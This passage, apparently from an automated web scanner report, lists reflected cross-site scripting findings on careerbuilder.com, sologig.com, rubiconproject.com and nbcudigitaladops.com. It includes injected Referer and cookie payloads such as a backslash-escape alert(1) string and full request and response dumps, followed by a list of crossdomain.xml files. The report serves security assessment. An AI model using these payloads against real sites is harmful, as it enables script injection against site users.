The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Jobseeker/Jobs/JobResults.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=19088\'%3balert(1)//259c27b2205

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182684
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 04 Sep 2011 01:25:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 19088\\';alert(1)//259c27b2205';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.114. http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/PLI/R/JSToolkit.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46ea\'%3balert(1)//ccd1a479379 was submitted in the Referer HTTP header. This input was echoed as a46ea\\';alert(1)//ccd1a479379 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PLI/R/JSToolkit.htm HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a46ea\'%3balert(1)//ccd1a479379

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35980
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR5
Date: Sun, 04 Sep 2011 01:25:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
rver='www';
s_cb.channel='JS_Resources';
s_cb.prop1='Toolkit';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - a46ea\\';alert(1)//ccd1a479379';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.115. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/jobseeker/companies/companysearch.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac754\'%3balert(1)//bf43d41b9e1 was submitted in the Referer HTTP header. This input was echoed as ac754\\';alert(1)//bf43d41b9e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jobseeker/companies/companysearch.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ac754\'%3balert(1)//bf43d41b9e1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242490
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 04 Sep 2011 01:26:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
';
s_cb.channel='JS_FindJobs';
s_cb.prop1='Search By Company';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - ac754\\';alert(1)//bf43d41b9e1';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.116. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/jobseeker/jobs/jobfindadv.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29a9c\'%3balert(1)//26924e3eff9 was submitted in the Referer HTTP header. This input was echoed as 29a9c\\';alert(1)//26924e3eff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jobseeker/jobs/jobfindadv.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=29a9c\'%3balert(1)//26924e3eff9

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50891
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 04 Sep 2011 01:25:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...

s_cb.channel='JS_FindJobs';
s_cb.prop1='Advanced Search - AL';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 29a9c\\';alert(1)//26924e3eff9';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.117. http://www.sologig.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sologig.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daacc\'%3balert(1)//bee404bb814 was submitted in the Referer HTTP header. This input was echoed as daacc\\';alert(1)//bee404bb814 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.sologig.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=daacc\'%3balert(1)//bee404bb814

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27472
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 04 Sep 2011 01:27:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
me - ';
s_cb.server='www.sologig.com';
s_cb.channel='js_home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - daacc\\';alert(1)//bee404bb814';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.118. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 339a4"><script>alert(1)</script>b294b1824ff was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=339a4"><script>alert(1)</script>b294b1824ff; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:24 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:24 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:24 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^28&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112475; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3152805.js^1^1315097124^1315097124&224353.js^1^1315097124^1315097124&3220233.js^1^1315097119^1315097119&3222405.js^2^1315097118^1315097119&3164882.js^1^1315097118^1315097118&3214995.js^4^1315096957^1315097118; expires=Sun, 11-Sep-2011 00:45:24 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1325

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=339a4"><script>alert(1)</script>b294b1824ff" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

5.119. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6291/9346/15214-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a1a"-alert(1)-"9813aded66a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/6291/9346/15214-15.js?cb=0.6276808138936758&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=18a1a"-alert(1)-"9813aded66a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 02:05:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^1630e6e4816a1fe505c6d800e&9346^58; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111289; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2014

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3150791"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=18a1a"-alert(1)-"9813aded66a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.120. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6291/9346/15214-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e793a"-alert(1)-"d2b2e260b31 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/6291/9346/15214-2.js?cb=0.41656556632369757&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=e793a"-alert(1)-"d2b2e260b31; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; ses2=5032^1; csi2=3214995.js^1^1315096957^1315096957

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:01:33 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:33 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 02:01:33 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^1630e6e488d0ee79e0d5a80a7&9346^49; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111506; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2014

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3150789"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=e793a"-alert(1)-"d2b2e260b31\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.121. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [xa cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nbcudigitaladops.com
Path:	/hosted/util/getRemoteDomainCookies.js

Issue detail

The value of the xa cookie is copied into the HTML document as plain text between tags. The payload 6a7e7<script>alert(1)</script>407e0c8623c was submitted in the xa cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallback HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xa=n6a7e7<script>alert(1)</script>407e0c8623c

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
Expires: Sun, 04 Sep 2011 00:52:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:52:44 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallback("xa=n6a7e7<script>alert(1)</script>407e0c8623c; pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

6. Flash cross-domain policy previous next
There are 127 instances of this issue:

http://a.tribalfusion.com/crossdomain.xml
http://ad.afy11.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://ad.turn.com/crossdomain.xml
http://admeld.adnxs.com/crossdomain.xml
http://admin.brightcove.com/crossdomain.xml
http://ads.undertone.com/crossdomain.xml
http://altfarm.mediaplex.com/crossdomain.xml
http://api.affinesystems.com/crossdomain.xml
http://api.bit.ly/crossdomain.xml
http://as.casalemedia.com/crossdomain.xml
http://audit.303br.net/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://c.brightcove.com/crossdomain.xml
http://c5.zedo.com/crossdomain.xml
http://c7.zedo.com/crossdomain.xml
http://cdn.cinesport.com/crossdomain.xml
http://cdn.gigya.com/crossdomain.xml
http://cdn.taboolasyndication.com/crossdomain.xml
http://cdn.turn.com/crossdomain.xml
http://cdn.visiblemeasures.com/crossdomain.xml
https://cdns.gigya.com/crossdomain.xml
http://clk.fetchback.com/crossdomain.xml
http://companion.adap.tv/crossdomain.xml
http://control.adap.tv/crossdomain.xml
http://d3fd89.r.axf8.net/crossdomain.xml
http://external.ak.fbcdn.net/crossdomain.xml
http://findnsave.sacbee.com/crossdomain.xml
http://gannett.gcion.com/crossdomain.xml
http://goku.brightcove.com/crossdomain.xml
http://gscounters.gigya.com/crossdomain.xml
http://i.w55c.net/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://imp.fetchback.com/crossdomain.xml
http://init.lingospot.com/crossdomain.xml
http://js.revsci.net/crossdomain.xml
http://load.exelator.com/crossdomain.xml
http://load.tubemogul.com/crossdomain.xml
http://log.adap.tv/crossdomain.xml
http://metrics.sprint.com/crossdomain.xml
http://motifcdn2.doubleclick.net/crossdomain.xml
http://nmcharlotte.112.2o7.net/crossdomain.xml
http://odb.outbrain.com/crossdomain.xml
http://p.brilig.com/crossdomain.xml
http://paid.outbrain.com/crossdomain.xml
http://pbid.pro-market.net/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://pixel.invitemedia.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://premium.mookie1.com/crossdomain.xml
http://qlog.adap.tv/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml
http://receive.inplay.tubemogul.com/crossdomain.xml
http://redir.adap.tv/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://s3.cinesport.com/crossdomain.xml
http://search.spotxchange.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://segments.adap.tv/crossdomain.xml
http://simg.zedo.com/crossdomain.xml
https://socialize.gigya.com/crossdomain.xml
http://sprint.tt.omtrdc.net/crossdomain.xml
http://statse.webtrendslive.com/crossdomain.xml
http://studio-5.financialcontent.com/crossdomain.xml
http://sync.adap.tv/crossdomain.xml
http://sync.mathtag.com/crossdomain.xml
http://sync.tidaltv.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://tcr.tynt.com/crossdomain.xml
http://traffic.outbrain.com/crossdomain.xml
http://trc.taboolasyndication.com/crossdomain.xml
http://usatoday1.112.2o7.net/crossdomain.xml
http://vast.ap919.btrll.com/crossdomain.xml
http://video.od.visiblemeasures.com/crossdomain.xml
http://wac.3a03.edgecastcdn.net/crossdomain.xml
http://www.goutsa.com/crossdomain.xml
http://www.wunderground.com/crossdomain.xml
http://www.zvents.com/crossdomain.xml
http://adadvisor.net/crossdomain.xml
http://charlotteobserver.adperfect.com/crossdomain.xml
http://cm.npc-mcclatchy.overture.com/crossdomain.xml
http://content.usatoday.com/crossdomain.xml
http://delivery.sprint.com/crossdomain.xml
http://developers.facebook.com/crossdomain.xml
http://disqus.com/crossdomain.xml
http://espn.go.com/crossdomain.xml
http://friendfeed.com/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://grfx.cstv.com/crossdomain.xml
http://ocp.ncaa.com/crossdomain.xml
http://onlyfans.cstv.com/crossdomain.xml
http://optimized-by.rubiconproject.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://picasaweb.google.com/crossdomain.xml
http://portfolio.us.reuters.com/crossdomain.xml
http://pubads.g.doubleclick.net/crossdomain.xml
http://rd.rlcdn.com/crossdomain.xml
http://rtq.careerbuilder.com/crossdomain.xml
http://search.charlotteobserver.com/crossdomain.xml
http://search2.sacbee.com/crossdomain.xml
http://snas.nbcuni.com/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://syndication.mmismm.com/crossdomain.xml
http://www.careerbuilder.com/crossdomain.xml
http://www.cars.com/crossdomain.xml
http://www.charlotteobserver.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.fansonly.com/crossdomain.xml
http://www.foxsportssouthwest.com/crossdomain.xml
http://www.latimes.com/crossdomain.xml
http://www.myspace.com/crossdomain.xml
http://www.reuters.com/crossdomain.xml
http://www.sacbee.com/crossdomain.xml
http://www.sologig.com/crossdomain.xml
http://www.stumbleupon.com/crossdomain.xml
http://www.tsn.ca/crossdomain.xml
http://www.usatoday.com/crossdomain.xml
http://www.wtp101.com/crossdomain.xml
http://www.youtube.com/crossdomain.xml
http://admin6.testandtarget.omniture.com/crossdomain.xml
http://api.twitter.com/crossdomain.xml
https://docs.google.com/crossdomain.xml
http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml
http://twitter.com/crossdomain.xml
http://www.traffic.com/crossdomain.xml

Issue background

